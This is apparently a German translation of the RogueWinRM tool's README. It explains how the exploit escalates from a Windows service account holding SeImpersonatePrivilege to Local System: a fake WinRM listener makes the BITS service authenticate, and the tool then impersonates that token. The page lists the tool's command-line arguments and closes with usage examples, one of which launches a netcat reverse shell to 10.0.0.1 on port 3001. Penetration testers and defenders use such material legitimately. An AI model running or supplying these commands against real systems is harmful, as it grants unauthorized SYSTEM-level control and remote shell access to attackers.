
Windows Lokale Privilegienerweiterung von einem Dienstkonto zum System
RogueWinRM ist ein lokaler Privilegienausweitungs-Exploit, der es ermöglicht, von einem Dienstkonto (mit SeImpersonatePrivilege) zum Local System-Konto zu eskalieren, wenn der WinRM-Dienst nicht läuft (standardmäßig unter Win10, aber NICHT unter Windows Server 2019).
Kurz gesagt, es horcht auf eingehende Verbindungen auf Port 5985 und gibt vor, ein echter WinRM-Dienst zu sein.
Es ist nur ein minimaler Webserver, der versucht, eine NTLM-Authentifizierung mit jedem Dienst auszuhandeln, der versucht, sich auf diesem Port zu verbinden.
Dann wird der BITS-Dienst (der als Local System läuft) ausgelöst und versucht, sich bei unserem betrügerischen Listener zu authentifizieren. Sobald er sich bei unserem Listener authentifiziert hat, können wir den Local System-Benutzer imitieren und einen beliebigen Prozess mit diesen Privilegien starten.
Eine vollständige technische Beschreibung dieser Schwachstelle finden Sie unter diesem Link --> https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/
RogueWinRM
Mandatory args:
-p <program>: program to launch
Optional args:
-a <argument>: command line argument to pass to program (default NULL)
-l <port>: listening port (default 5985 WinRM)
-d : Enable Debugging output

Ausführen einer interaktiven cmd:
RogueWinRM.exe -p C:\windows\system32\cmd.exe
Ausführen einer Netcat-Reverse-Shell:
RogueWinRM.exe -p C:\windows\temp\nc64.exe -a "10.0.0.1 3001 -e cmd"